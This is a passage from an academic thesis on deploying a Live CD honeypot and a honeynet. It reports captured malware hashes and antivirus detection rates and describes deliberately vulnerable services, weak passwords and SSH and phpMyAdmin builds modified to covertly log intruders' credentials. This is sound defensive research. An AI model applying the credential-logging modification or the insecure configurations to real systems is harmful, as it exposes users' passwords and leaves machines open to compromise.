KDE program. Contains user-specific settings and definitions. Configuration files that are stored in this directory tree take higher precedence over system-wide declarations. Table 4.10: Important User and System-Wide Directories of the KDE Platform (Source: Based on Seigo, 2007) (a) Initialization of the Main Desktop Environment (b) Running Instance of the nepenthes Honeypot Figure 4.14: User Interface of the Live CD to maintain the integrity of the system. Once all modifications are completed, we have to update the file system modules and create a new version of the distribution as described in Section 4.3.3.1. Finally, we only need to burn the generated image to CD in order to finish the remastering and customization process of the Live CD. Two sample screenshoots of the user interface are shown in Figure 4.14(a) and 4.14(b). 73 4 Development of a Live CD-Based Honeypot 4.3.4 Capturing Autonomously Spreading Malware with the Live CD In order to assess the operability of our Live CD, we have implemented a working prototype and captured autonomously spreading malware over a period of two months, from March 7, 2008 to May 7, 2008. Our test sensor was deployed in the IP range of a German private Internet service provider (ISP). Apart from minor reconfiguration and maintenance breaks, the system was continuously running 24 hours a day. Due to administrative reasons, the IP address of the machine was dynamically updated every night. An overview about the results of our research is subject of the following section. However, we need to emphasize that these results must be regarded as preliminary. Further studies have to be conducted in the future to generate more empirically valid and representative statistics. 4.3.4.1 Overview about the Collected Data Throughout the observation period, our Live CD sensor was targeted more that 46,000 times. 40 countries were involved in the incidents. More than 98% of all probes were traced to cities in Germany, the Russian Federation, and the United States though (cmp. Figure 4.15). Regarding the intensity of the attacks, the number of malware samples nepenthes identified and tried to retrieve varied significantly (see Figure 4.16): While we detected almost 3,300 download attempts on May 4, this number dropped to the smallest value of 21 only three days later on May 7, the end of our experiment. On average, our honeypot sought to gather 837 binaries per day. Figure 4.15: Origin and Intensity of Malware Attacks 74 4 Development of a Live CD-Based Honeypot Figure 4.16: Number of Detected Malware Downloads and Submissions per Day However, it is also important to note that, in many cases, the collection process was not successfully completed, e.g., because the server the malicious software application resided on had been shut down in the meantime (cmp. also Provos and Holz, 2007). For this reason, solely 15,578 executables could be fetched. A list of the most frequent threats that we have seized with our Live CD can be found in Table 4.11. Each of the captured files was sent to a central analysis station for further investigation as explained in Section 4.3.2 (see also the red graph in Figure 4.16). Thereby, we were able to study its behavior in more detail. In particular, we examined outbound network connections that were initiated with the external environment as well as manipulations of the underlying system platform. An example of a summary report that was returned by the analysis station at the end of the examination process can be found on the accompanying CD of this thesis. A complete description about the functionality of the station is given by Willems et al. (2007). We also checked the set of unique submitted samples with a list of 32 different virus scanners. A file is defined as unique if its cryptographic checksum is different from the remaining malware species. A binary that is falsely classified as being uninfected in the course of this process indicates a severe threat, since it is not yet included in the definition database of the antivirus vendors and, thus, may potentially bypass the security restrictions of the local system. In total, 1,013 files were scanned. The results of these scans are briefly described in the next section. 75 4 Development of a Live CD-Based Honeypot Malware Worm.VanBot.AX.215 Win32.Virut.AL Win32.Virut.AL (Variant) Trojan.Dldr.Delf.buz Worm.SdBot.100864.22 Worm.SdBot.444416 Trojan.Agent.143360.4 Worm.VanBot.FO Win32.Virut.AL (Variant) Win32.Virut.Gen MD5 Checksum Submissions 954a98c971fda498f9d1211f18e75cd7 851 0c22f6dc09641566e42984323b869136 523 175dffd2f768887fbd0b156383cf3b05 444 364389256ea74bb06d6825e7ee1689d9 417 7fdfe363d51e27caa1b6d490646e66f5 410 146d61fca77d748f5a5ecff53afd30e4 402 2aa59ba4251795deda72738d1c67be7c 351 bec892aaf3a5d697da7db26bb3d32028 331 1000e2436a560eaeaa01a1029d8f33b4 276 2383438901c46f3672b047961e8533b9 214 Table 4.11: Top Malware Samples Captured with the Live CD 4.3.4.2 Evaluation of the Collected Data On average, the different virus scanners were capable of correctly identifying almost 82% of the malware samples. However, the quality of the individual software products partially differed dramatically. As indicated in Figure 4.17, only one of the 32 vendors detected more than 98% of the malicious applications. In contrast, four scanners erroneously reported more than 20% of the infected binaries as clean. The performance of the different solutions is illustrated in more detail in Figure 4.18. Even though most detection rates are comparatively high, it must, however, also be stressed that about 10% of the captured executables were unrecognized by at least two vendors. In 27 cases, more than 80% of the scanners failed to discover the security threat. One binary with the cryptographic checksum b670a676045337c77838c8ab4597dfcb even completely slipped by and remained hidden from all tested products. Figure 4.17: Detection Rates of 32 Antivirus Vendors 76 4 Development of a Live CD-Based Honeypot Figure 4.18: Individual Performance of 32 Antivirus Vendors 4.3.5 Summary In this chapter, we have described the selection and development process of a Live CD-based honeypot. A Live CD completely runs in memory and provides an operating system, a number of applications, as well as a basic user environment. When the machine is rebooted, changes made during runtime are reset, i.e., the decoy may be quickly restored after a compromise. Instead of building our own Live CD from scratch, we have decided to remaster an existing distribution and adjust its features to our needs. For this reason, we have evaluated various potential candidates and selected the Slackware-based Slax as a starting point for our project. Due to its modular design, it is comparatively easy to adapt. Furthermore, it is compatible to most modern day computer systems and is actively supported by a vivid community. Regarding the honeypot solution, we chose to implement nepenthes, a low-interaction decoy that is capable of collecting autonomously spreading malware on a large scale by emulating common vulnerabilities. It is highly scalable, consumes only small amounts of space and, thus, is well-suited for a Live CD environment with limited system resources. To ensure the security and integrity of the CD, the honeypot was packaged within its own file system module and is executed within a so-called jail. The jail provides 77 4 Development of a Live CD-Based Honeypot a pseudo root directory and is physically strictly separated from other parts of the operating system. Additionally, by shutting down unnecessary services, using a twofactor authentication mechanism for the SSH remote administration server, and defining access control lists, we hardened the system further against attacks. We have developed a working prototype of the CD with its own system kernel, boot loader, and a customized graphical user interface. Over a period of two months, we have captured malware samples and collected more than 1,000 unique malicious binaries. Based on the data set, we have evaluated the performance of different antivirus solutions. In sum, most samples were correctly reported as being suspicious. However, about one tenth of the executables were not properly recognized by the products and remained undetected. Our Live CD may help improve detection rates in the long term by finding new and unknown threats. Thereby, malicious activities on the Internet may potentially be measured and assessed more accurately. 78 5 Implementation, Deployment, and Analysis of a Honeynet In the previous chapter of this thesis, we have described the development process of a Live CD-based low-interaction honeypot for capturing and analyzing autonomously propagating malware. As we have pointed out, by emulating a number of known security weaknesses, we were able to attract common species of malicious software, study their behavior, and generate statistical reports about their spread on the Internet. Although the collected data are beneficial for assessing the general level of threat from an abstract point of view, we did learn only little on why systems are actually attacked and what they are used for once a compromise has succeeded. To help answer these questions, we set up a group of high-interaction honeypots within a honeynet. As explained in Chapter 3, this honeynet is a highly overt network environment as all incoming communication requests are passed to the interconnected machines without being filtered. On the other hand, outgoing traffic flows are tightly controlled by several layers of data capture and data control. As a consequence, we may implement full-featured operating systems, applications, and services that potentially allow monitoring more complex and sophisticated attacks. At the same time, we can keep the risk for non-affected third parties at a minimum. Due to the manifold possibilities for interaction, the individual electronic baits are likely to attract not only automatically spreading malware, but human attackers as well (cmp. Curran et al., 2005). In comparison to low-interaction honeypots, we thus have the chance of gaining a more thorough insight in the psychology of adversaries and learn more about their tools, tactics, and motives. Outline of the Chapter In the following section, we outline the architecture of our honeynet and the respective system environment. We describe the technical specification of the individual honeypots, illustrate the deployment of the Honeywall, and introduce various tools and utilities that help monitor, capture, as well as analyze malicious activities. An overview about the data that we have collected with our honeynet is subject of Section 5.2. We also sketch common attacks on the decoys that we have frequently detected during the observation period. Two selected system compromises are presented in more depth in Section 5.3. We conclude with an analysis of a covert underground communication channel and a short summary of our findings. 79 5 Implementation, Deployment, and Analysis of a Honeynet 5.1 Overview about the Architecture of the Honeynet and the System Environment The core of our honeynet consists of three, independently-running high-interaction honeypots that are set up within virtual machines for maintenance reasons as we have indicated in Chapter 2. Regarding the technical specification of the decoys, we decide to implement both Microsoft Windows and Linux operating systems. Thereby, we are able to measure intrusion attempts on two major platforms many desktop and server machines are based on (cmp. Net Applications, 2009). Additionally, we install several well-known web applications that commonly fall prey to attacks. These applications usually collaborate with further, underlying technologies such as database engines which are significantly more complex to administrate and maintain. Due to these reasons and an often poor quality of the source code (see Holz et al., 2006), vulnerabilities in either of these software tiers may possibly lead to a total system compromise. As web applications may thus involuntarily act as a “stepping stone into more sensitive parts of the victim’s network” (Riden et al., 2007), they are well-suited for our research purposes. We also set up a number of system services with certain misconfigurations that are likely to be discovered and exploited. For instance, we define improper access rights for a file transfer server and permit even non-authenticated users to upload and execute their own files. Thereby, we imitate the behavior of a so-called anonymous server which is frequently abused by software pirates to share illegally obtained media (see also McClure et al., 2005; Craig and Burnett, 2005). Because of the different security weaknesses, our honeypots form attractive targets for cyber criminals. In order to make their disclosure more difficult, we develop a bogus website for a fictional university chair, including phony information about lectures and academic curricula. Thus, we are able to embed the web applications and services in a more realistic scenario, making the machines appear as legitimate productive systems. It is important to stress though that an experienced attacker will presumably not be deceived by these activities but will rather be able to reveal the true nature of the decoys, e.g., by identifying specific anomalies in the system architecture (see Chapter 2 and Corey, 2003, 2004; Garfinkel et al., 2007). However, as these techniques usually require certain skills, we can still learn valuable information: As Provos and Holz (2007) conclude, “although honeypot detection might seem to be of more benefit to malicious adversaries, in computer security, it is important to understand all aspects of a system (...) and the flaws of your technology”. In the last step, we prepare several fake documents that we store on each of our machines. For example, we compose an executive summary for an imaginary project that contains valid account names and passwords to one of our honeypots. If an attacker retrieves the information and tries to log in, we can start tracing activities across multiple systems. As such, the documents act as honeytokens and prove unauthorized access of the respective resources (cmp. Spitzner, 2003f). What is more important, we are able 80 5 Implementation, Deployment, and Analysis of a Honeynet to depict interactions between the various decoys, hence creating a potentially more accurate profile of the intruder as well as her intentions. The characteristics of the individual honeypots and their components are presented in more detail in the following. 5.1.1 Technical Specification of the Honeypots As indicated in the previous section, we implement three electronic baits based on Microsoft Windows and Linux operating systems. 5.1.1.1 Microsoft Windows-Based Honeypot The first honeypot we deploy runs a Microsoft Windows XP operating system with a pre-installed service pack 2. Access is permitted for the system administrator as well as for a non-privileged user. Both accounts are solely protected with weak passwords. Therefore, we expect adversaries to perform dictionary and brute force attacks over the network in order to successfully compromise the host. Additionally, we set up the latest xampp1 distribution by Kai Seidler. It comprises an Apache web server, the MySQL database management system, a basic file transfer server, and support for several programming languages such as PHP and Perl. In its default configuration, the distribution is inherently insecure (cmp. Vogelgesang, 2007). For example, the phpMyAdmin administrative user interface for the database management system2 is fully accessible over the Internet. As we will see later, this feature puts the security of the entire machine at risk. We also install the phpBB web application3 , a popular forum software which was originally developed by James Atkinson. The rather outdated version 2.0.8a is exposed to multiple vulnerabilities that may reveal potentially sensitive information such as the full path to the root directory (see Vind, 2005). Furthermore, the program contains several highly critical programming flaws that may help attackers get system access or manipulate data (see Secunia, 2004; CERT, 2004). Because of these characteristics, our machine forms a relatively easy target for intruders and is likely to be probed frequently. 5.1.1.2 Linux-Based Honeypots Apart from the Windows-based honeypot, we run two electronic baits with Linux operating systems that are built on the Fedora Core and Suse distributions. 1 see http://www.apachefriends.org/en/xampp.html see http://www.phpmyadmin.net/ 3 see http://www.phpbb.com/ 2 81 5 Implementation, Deployment, and Analysis of a Honeynet • Fedora Core-Based Honeypot The second decoy within our honeynet setup is implemented upon an installation of the Fedora Core 3 release4 . It includes the Apache web server and the MySQL database management system. However, in comparison to the xampp distribution that we have introduced in the previous section, the configuration of the individual applications is more secure by default. For instance, the web server is started with non-privileged access permissions, and logins to databases are restricted to local users only. For this reason, we assume that intruders must attempt more sophisticated penetration strategies, e.g., executing exploits, to manipulate these services. Similar to the Windows-based honeypot, we run a web application, namely the TikiWiki content management system5 . Version 1.8.4 of the software is affected by several critical security weaknesses (cmp. Secunia, 2009b). For example, due to an input validation error, attackers may upload and run their own scripts in a temporary directory (see CVE, 2005). By passing specially crafted parameters to certain pages, it is also possible to read arbitrary files on the system and disclose sensitive information (see iDefense, 2005). In the next step, we set up communication and file transfer programs that form valuable targets for adversaries as well: First, we compile an outdated version of the WUFTPD daemon6 which is prone to a remote buffer overflow (see CVE, 2003). Since the exploit code for this vulnerability is publicly available (see Dong-Hun, 2003), we suppose the computer to get compromised within a short amount of time. Furthermore, we redefine the configurational settings of the service and permit world-writable access to certain directories. As a consequence, our system appears as an anonymous server to the external environment and is likely to attract software pirates as explained in Section 5.1. Second, we install a secure shell server that contains a number of buffer management flaws. When abused, attackers may inject malicious instructions and gain control of the machine (see CERT, 2003b). The server is also of great interest to intruders, because data flows are always sent over an encrypted channel. As a result, monitoring and filtering devices such as firewalls can be effectively bypassed. • Suse-Based Honeypot The third and last honeypot within our honeynet is built on a Suse Linux operating system, version 9.3. As is the case with the two other decoys, we run the default Apache web server and the MySQL database management system that are provided with the distribution. The latter is vulnerable to a remote buffer overrun and may cause arbitrary code execution or lead to a denial of service situation (see SecurityFocus, 2006a). The respective exploit is published by Paola (2006). 4 see http://fedoraproject.org/ see http://info.tikiwiki.org/tiki-index.php 6 see http://www.wu-ftpd.org 5 82 5 Implementation, Deployment, and Analysis of a Honeynet We also deploy three web-based programs which may be attacked with different techniques: The phpMyFAQ application7 permits implementing a bulletin board for frequently asked questions (FAQs). Version 1.6.6 suffers from various security weaknesses (cmp. Secunia, 2009a). For instance, input parameters are not sanitized properly. Consequently, adversaries are able to manipulate database queries, inject malicious code, and penetrate the underlying system (see CVE, 2006b). The TR NewsPortal software8 is a simple newsreader by Adam Glowienka. Due to an input validation error in the release version 0.36a, attackers can include their own scripts and compromise the host as demonstrated by Kacper (2006) (see also SecurityFocus, 2006b). Furthermore, the version of the phpMyAdmin database management utility that is distributed with our Linux installation contains multiple cross site scripting (XSS) vulnerabilities. Thereby, it is possible to insert malicious code instructions and potentially disclose sensitive information, e.g., authentication credentials (cmp. SecurityFocus, 2006c). Finally, we install a secure shell as well as a Samba server to support remote interactions with the core system. A samba server facilitates communication between machines in a hybrid environment by maintaining a number of directories that are globally shared in a network. Thereby, computers running Linux operating system can, for example, retrieve resources on a Windows-based host and vice versa (cmp. Eckstein et al., 2007). We define several of these network shares with full access permissions on each honeypot. Thus, once a decoy is compromised, it may be used as a starting point to attack the remaining systems within our honeynet. As a result, we can monitor incidents on a network-wide scope and gain a more thorough understanding about the strategies and intentions of the intruder. The technical specifications of the individual honeypots are summarized in Table 5.1. As can be seen, the installed services and applications contain various vulnerabilities that are, for example, caused by input validation errors and poorly designed access permissions. When a decoy is successfully penetrated, it poses a significant threat to other machines on the network as well as to non-affected third parties. That is why we must make sure adversaries do not accidentally or purposefully harm systems outside of the honeynet (cmp. Honeynet Project, 2004b, p. 38). We can mitigate that risk with the help of the Honeywall. The corresponding setup is subject of the following section. 7 8 see http://www.phpmyfaq.de/ see http://www.newsportal.one.pl/ 83 5 Implementation, Deployment, and Analysis of a Honeynet Honeypot - Windows XP, Service Pack 2 Description Service Name Web server which is required to run PHP-based appliApache 2.2.8 cations and display dynamic content. FTP server that allows exchanging files over the Internet. The default authentication credentials for the administrative account are published “in the wild”. ThereFileZilla 0.9.25 beta fore, intruders may easily gain access and explore the entire directory hierarchy as well as upload their own tools. Database management system with built-in support for remote logins. The application can be quickly comproMySQL 5.0.51 mised, because the root superuser account is not protected with a password. Description Web Application Forum software which contains several highly critical programming flaws and may disclose sensitive informaphpBB 2.0.8a tion as well help attackers get access to the system. Front end for the MySQL database management system. The application is fully accessible over the network and phpMyAdmin 2.11.4 permits manipulating all databases that are stored on the machine. Honeypot - Fedora Core 3 Description Service Name Web server which is required to run PHP-based appliApache 2.0.52 cations and display dynamic content. Database management system which is solely protected with a weak password. Due to the configurational setMySQL 3.23.58 tings, logins are only possible after gaining shell-level access though. Secure shell server that contains several buffer management flaws. If the vulnerabilities are abused, arbitrary commands may be executed on the host. Additionally, OpenSSH 3.7.1p1 the server permits adversaries establishing encrypted communication channels. Thus, network eavesdropping is made more difficult. FTP server that permits anonymous write operations. As a result, the server can be abused by software pirates WU-FTPd 2.6.0 to store copyright-violated material. Table continues on the following page. 84 5 Implementation, Deployment, and Analysis of a Honeynet Description Content management system that does not validate user input properly. Consequently, intruders may upload TikiWiki 1.8.4 their own scripts as well as read arbitrary files on the system. Honeypot - Suse Linux 9.3 Description Service Name Web server which is required to run PHP-based appliApache 2.0.53 cations and display dynamic content. Database management system that is affected by a buffer overrun vulnerability and may cause a denial of MySQL 4.1.10a service situation. Secure shell server that contains several buffer management flaws. If the vulnerabilities are abused, arbitrary commands may be executed on the host. Additionally, OpenSSH 3.7.1p1 the server permits adversaries establishing encrypted communication channels. Thus, network eavesdropping is made more difficult. Software for providing file as well as printer sharing services across a network. Since network shares are defined Samba 3.0.12-5 on each machine, they may be used as a starting point for further attacks. Description Web Application Front end for the MySQL database management system. The installed version is vulnerable to multiple cross site phpMyAdmin 2.6.1 scripting attacks and allows intruders to insert malicious code instructions. Bulletin board software for frequently asked questions that is prone to malicious SQL and code injection techphpMyFAQ 1.6.6 niques that may be exploited to gain system access. Simple newsreader program that contains an input valTR NewsPortal 0.36a idation error and enables attackers to include their own scripts. Web Application Table 5.1: Technical Specification of the Honeypots 5.1.2 Deployment of the Honeywall As we have already explained, the Honeywall acts as a gateway system to the honeynet where all traffic flows have to pass through. It comprises various monitoring and filtering devices such as IPTables, Snort, and Snort Inline that we have described in depth in 85 5 Implementation, Deployment, and Analysis of a Honeynet Chapter 3. With the help of these applications, incoming and outgoing network packets can be inspected and, if required, even be discarded. Thereby, attacks on the external environment can be effectively prevented. As such, the gateway meets the requirements for data control as imposed by the Honeynet Project (2004a) which are crucial to a safe deployment of electronic baits. Moreover, it satisfies the conditions concerning data capture and data analysis by providing several tools for monitoring, logging, and investigating malicious activities (see also Chapter 3). Because of these characteristics, the Honeywall is often regarded as the “heart” of a honeynet (cmp. Provos and Holz, 2007). We may easily set up the whole system including all components with the Roo CD which is distributed by the Honeynet Project. It can be downloaded for free from the project homepage9 . When the CD is booted, it automatically begins to install a hardened Linux operating system. During this process, existing partitions and files on the hard disk of the machine are overwritten. For proper functionality in later use, we recommend a computer with at least 512 MB of memory, an x86 Intel Pentium processor, 10GB of free space, and three network interface cards (NICs) (see Honeynet Project, 2007). After completing the installation procedure, the system is rebooted, and we can start to customize the Honeywall according to our needs. For this purpose, we must log in with the default authentication credentials (username roo, password honey), switch to the superuser mode with the same password, and run the menu command to invoke the main configuration utility for the honeynet. The different configuration settings and parameters may then be adjusted with a dialog-based interview wizard. An overview about the most important options that must be specified during the interview is given in Table 5.2, the entire configuration file can be found on the accompanying CD of this thesis. Configuration Options Honeypot-Related Options Management Interface-Related Options 9 Description Honeypot-related options mainly comprise the network configuration for the individual decoys, e.g., the assigned IP address. With the help of these options, it is possible to set the network parameters for the Walleye web management interface such as the address of the default gateway, the DNS servers that are associated with the application, or the system name of the host. Table continues on the following page. see https://projects.honeynet.org/honeywall/ 86 5 Implementation, Deployment, and Analysis of a Honeynet CRLM (Connection Rate Limiting Mode) options specify the number of outgoing connections that may be initiated by the honeypots before being filtered. The recommended settings for these options were outlined in Chapter 3. Address filtering options include information about black and white lists that control what machines are granted or rejected access to the honeynet. Additionally, a so-called fence list can be defined in order to block outgoing connections from a decoy to specific network segments. With these options, automatic email alerts may be enabled or disabled that are sent to the honeynet administrator once an incident is detected by the Honeywall. These options help configure the server component of the Sebek data monitoring utility. For instance, the destination address and the network port for the Sebek notification packets can be specified. CRLM Options Address Filtering Options Alerting Mode Options Sebek Options Table 5.2: Important Configuration Options of the Honeywall At the end of the interview, the affected filtering and monitoring services are restarted. However, before putting the Honeywall into operation, we adapt the local time zone and synchronize the hardware clock as illustrated by the Honeynet Project (2005c). These steps are of utter importance to recover the exact sequence of an incident during the investigation phase at a later point of time. Furthermore, we initialize Tripwire10 , a host-based intrusion detection system, that is already included in the system (see also Honeynet Project, 2005b). It periodically performs an integrity check for each file. Thereby, potential manipulations of the individual components can be discovered. When all operations are finished, we may retrieve the status of the Honeywall at all times using the Walleye web management interface which is part of the Roo distribution. The management interface must be launched over an encrypted channel for security 10 see http://www.tripwire.org/ 87 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.1: Main Screen of the Walleye Web Management Interface reasons. After logging in as the admin user, a summary of the traffic flows entering or leaving the honeynet as well as the number of detected intrusions is displayed in the upper left corner of the screen (see Figure 5.1). By clicking on a highlighted element in one of the different columns, we can request additional information about network activities (see Figure 5.2). It is also possible to inspect specific connections in more detail, e.g., to examine a penetration attempt that was detected by our Honeywall as shown in Figure 5.3. In the given example, an attacker with the IP address 218.44.xxx.xxx repeatedly failed to access a network share on our Microsoft Windows honeypot via the Netbios and Samba (SMB) protocols. In addition to data analysis-related features, Walleye also allows to fully reconfigure the honeynet architecture and supports changing certain system settings such as the keyboard language or the hostname. As a consequence, we can perform many administrative tasks comfortably over the Internet without needing to log in to the local machine. In summary, these mechanisms make the web management interface the primary tool for the everyday observation and maintenance of the honeynet. 88 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.2: Overview about the Network Flows from/to the Honeynet Figure 5.3: Example of an Intrusion Attempt on a Honeypot 5.1.3 Preparation of the System Environment Even though the Honeywall implements sophisticated applications to capture, control, and analyze malicious activities, we recommend setting up several other programs before connecting the honeynet to the external environment. These programs either help collect more extensive information about adversaries or facilitate the post-incident investigation process after a decoy has been compromised. 5.1.3.1 Implementation of Data Capture-Related Programs • Sebek Sebek11 is a utility for capturing activities on a honeypot and is maintained by the Honeynet Project. We have already described its architecture as well as its technical 11 see http://www.honeynet.org/tools/sebek/ 89 5 Implementation, Deployment, and Analysis of a Honeynet specification in detail in Chapter 3. Therefore, only the deployment process of the utility is presented in the following. As we have explained, Sebek consists of a client as well as a server component. The latter is part of the Honeywall, while the client component must be separately installed on each decoy. On Linux operating systems, Sebek is implemented as a loadable kernel module, i.e., it can be dynamically attached to the kernel at runtime (cmp. Kroah-Hartman, 2006). For this reason, in order to build the module, we must first download the source code for the kernel the utility will later run on. In the next step, the source code must be prepared and compiled as outlined in Section 4.3.3.5 with respect to the custom kernel of our Live CD. When this operation is completed, we are able to start the configuration and compilation process of the Sebek module. The generated archive can then be transferred to the target system and be decompressed. To deploy the Sebek client, we simply need to run the respective install script. However, before we execute the script, we need to make sure all its configuration parameters are correctly specified as outlined by the Honeynet Project (2003c). For instance, it is particularly important to define the MAC (Media Access Control) address and the destination port of the gateway system, otherwise clientrelated notification packets are not delivered to the Sebek server and cannot be analyzed on the Honeywall. When the module has been successfully installed, keystrokes and system relevant information on the honeypot are captured until the machine is rebooted. In turn, if an adversary manages to restart the computer her activities are not recorded any longer. Therefore, we must carefully monitor the state of our decoys at all times and reinstall the monitoring devices if necessary. The client component is also available for Microsoft Windows operating systems. It is implemented as a device driver and may be easily set up by running an installation wizard which is part of the main program archive. In our case, however, the affected systems tended to get extremely unstable and permanently crashed with a blue screen after the application had been deployed. For this reason, we omitted the Sebek package for our Windows XP honeypot, and data were merely collected with the help of network monitoring devices. • Trojaned System Services The Sebek utility is most helpful to monitor attackers after a system has been successfully compromised. On the other hand. it is not capable of gathering extensive information about penetration attempts. For example, when an intruder fails to log in to a specific machine, the respective authentication credentials are not recorded. In case strong encryption algorithms are being used, we are not able to recover these pieces of information from the captured network logs either. The data is of high value though, because common usernames and passwords that are tested during an attack can be identified. Therefore, to close the information gap, we implement trojaned versions of 90 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.4: Example of a Trojaned System Service a number of system services such as the SSH server or the phpMyAdmin database administration program. For this purpose, we edit the source code of the applications and adapt their authentication procedure as follows: When an intruder enters a username and corresponding password, the data is silently written to a special file before being encrypted and getting processed. The file is protected with our own encryption key to conceal its content. We also restore its access and modification timestamp so it does not stand out from other files in the same directory. The entire process for a sample trojaned system service is illustrated in Figure 5.4. Even though the approach helps capture data about adversaries it suffers from several disadvantages: First, we store security-relevant information directly on a honeypot. Hence, the data may potentially be discovered and deleted. Consequently, the requirements and standards as postulated by the Honeynet Project (2004a) are violated. Second, a skilled attacker can rather easily detect the manipulation. For instance, by running the strace command, it is possible to monitor all files that are referenced by a process. Due to these weaknesses, the solution is only applicable on an interim basis and must be replaced by more efficient implementations in the long term. 5.1.3.2 Implementation of Data Analysis-Related Programs After a decoy has been compromised, we usually have to parse through an enormous amount of data in order to recover the individual steps and activities of the intruder. These operations are extremely time-consuming. For example, members of the Honeynet 91 5 Implementation, Deployment, and Analysis of a Honeynet Project (2004c) expect to “spend up to forty hours of analysis for each hour of attack traffic that has been collected from the honeynet”. Furthermore, an analysis is often complex, because multiple sources of information such as network packet dumps or log files must be linked in order to see “the big picture”, corroborate hypotheses, and draw conclusions. However, various tools may significantly support the work of security professionals and honeynet administrators and can be of great help when examining an incident. These tools can be divided into different categories and are briefly described in the following. • Network-Related Analysis Tools As we have already explained, all network flows entering or leaving the honeynet are recorded with the help of several data capture applications (see Chapter 3 and Honeynet Project, 2004a). These flows are stored within so-called PCAP (packet capture) files and are essential when certain actions of an adversary must be studied in more detail. To process these files efficiently, we recommend installing four tools, namely Wireshark, SSLDump, Honeysnap, and DataEcho. Wireshark12 is, according to its creators, one of the leading network analyzers (see also Orebaugh et al., 2007) and is available for many different platforms, including both Linux as well as Microsoft Windows operating systems. In contrast to similar applications such as Tcpdump13 , PCAP files are not processed on the system console but are presented in a feature-rich graphical user interface. Thereby, it is, for instance, easily possible to extract the communication protocol of an entire FTP session (see Figure 5.5) or to inspect specific packet streams with the help of a powerful filtering language. As we will see later, Wireshark is also capable of dealing with encrypted traffic once the correct key is provided. Even when a network analyzer is being used, a secured communication channel may easily remain undiscovered in the vast of network flows if it is established on non-standard system ports. With regards to this case, we can run the SSLDump utility by Eric Rescorla14 . It enables to identify any connections that are protected with the SSL (Secure Socket Layer) or TLS (Transport Layer Security) algorithms. Although the underlying data packets cannot be read unless a so-called keyfile and corresponding password are specified, encrypted network activities within a honeynet are suspicious by nature and should be carefully watched (cmp. Honeynet Project, 2004b). To get a general overview about the contents of a PCAP file, the Honeysnap program by Arthur Clune is very useful15 . It is distributed free of charge by members of the Honeynet Project and requires a pre-installed Python environment16 to be executed 12 see see 14 see 15 see 16 see 13 http://www.wireshark.org/ http://www.tcpdump.org/ http://www.rtfm.com/ssldump/ https://projects.honeynet.org/honeysnap/ http://www.python.org/ 92 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.5: Restoring a Captured FTP Session with Wireshark properly. With Honeysnap, we are able to generate summary reports about traffic flows, dissect individual connections, and analyze certain communication protocols in depth. We can also search for specific keywords and commands within a recorded IRC (Internet Relay Chat) session. The latter is particularly interesting, because the IRC protocol is frequently abused by adversaries to control so-called botnets, i.e., networks of compromised machines (see Holz, 2005; Bächer et al., 2008). Finally, we suggest installing DataEcho17 by the Solera Networks group which is particularly suitable for analyzing web application-related activities. It implements its own web browser and permits viewing page requests and responses comfortably in a graphical window. In the example shown in Figure 5.6, DataEcho is capable of restoring an attack tool that was run during an intrusion of one of our decoys. 17 see http://sourceforge.net/projects/data-echo/ 93 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.6: Analyzing Web-Based Attacks with DataEcho • File-Related Analysis Tools Adversaries often transfer their own tools and applications to the target machine, either to fully penetrate the system or to use it as a starting point for further attacks (cmp. Honeynet Project, 2000b). In many cases, these tools are erased after being executed though in order to hide traces and evade detection. On the other hand, the programs may provide significant hints concerning the origin, intentions, and skills of the attacker and, therefore, are worth restoring. To recover deleted information on a honeypot, we can try to analyze sections of memory as well as file partitions on the respective hard disks. This approach is explained in detail by Farmer and Venema (2005). Alternatively, we may attempt to reconstruct the affected data directly from our network records. We present two tools that are explicitly designed for these purposes. 94 5 Implementation, Deployment, and Analysis of a Honeynet With PEHunter by Tillmann Werner18 , we can extract Microsoft Windows executables out of the network traffic. The application consists of a server and client component and must be built and executed on a Linux operating system as shown in Listing 5.1. When the server is started, it is bound to an open system port and begins processing the recorded network packets that are replayed by the client program. Once the header of an executable is found, the file is restored and saved to hard disk. Header recognition techniques are also implemented in Foremost19 , a so-called data carving utility that was originally developed by the United States Air Force Office of Special Investigations (AFOSI) and the Center for Information Systems Security Studies and Research (CISR). It is compatible to Linux operating systems and variants of the Berkeley Software Distribution (BSD) and is freely available for download. One of its primary features is to recapture images and pictures from network streams, but it often manages to recover documents as well as video and audio files, too. # b u i l d t h e i n d i v i d u a l c o m p o n e n t s o f PEHunter gcc -o pehuntd pehuntd . c pehuntd . h md5 . c md5 . h - Wall - Werror gcc -o pehuntc pehuntc . c - Wall - Werror # g r a n t e x e c u t e p e r m i s s i o n s t o t h e b u i l t components chmod 755 pehuntd pehuntc # e x e c u t e t h e s e r v e r and e x t r a c t t h e c a p t u r e d b i n a r i e s ./ pehuntd ./ pehuntc < packet capture file > Listing 5.1: Restoring Windows Executables with PEHunter • Log File-Related Analysis Tools Apart from recorded network dumps, log files that are generated by the Snort intrusion detection system on the Honeywall contain valuable information about security-relevant incidents, e.g., the date, time, and origin of an attack. Since a different log file is created for each day, accumulating the data manually and preparing a monthly or even annual status report of the honeynet can be quite cumbersome. For this reason, we install the SnortALog utility by Jérémy Chartier20 . It only requires a working Perl interpreter and, hence, can be run on most platforms, including Microsoft Windows. SnortALog is capable of processing multiple log files simultaneously and prints a summary of the detected alerts, the IP addresses involved, and sorts the entries according to their severity. Furthermore, due to a number of filter expressions, specific warning and notification 18 see http://honeytrap.mwcollect.org/pehunter.html see http://foremost.sourceforge.net/ 20 see http://jeremy.chartier.free.fr/snortalog/ 19 95 5 Implementation, Deployment, and Analysis of a Honeynet messages by the intrusion detection system can be excluded from the final report if desired. These features make SnortALog highly efficient when observing the state of individual decoys and help security professionals save time during an investigation. • System-Related Analysis Tools After a system has been compromised, we must not use its file and process utilities for our analysis because of several reasons: First, the operating system may be subject to subversion (cmp. Carrier, 2006). For example, many attackers download rootkits to the target computer after a successful intrusion in order to conceal their presence. Rootkits are “Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to and hide on a machine” (Skoudis and Zeltser, 2003, p. 303). Because of these modifications, the underlying platform must not be trusted any longer. Second, by executing programs on the local computer, the MAC times of certain files are likely to be updated. The MAC times keep track on when a file or its meta-information was accessed, modified or changed for the last time (cmp. Farmer and Venema, 2005). When these times are altered, we are unable to restore the original state after the break-in, the system is contaminated with our own traces, and pieces of evidence are potentially destroyed. To circumvent these problems, we propose to boot a penetrated honeypot from the Helix 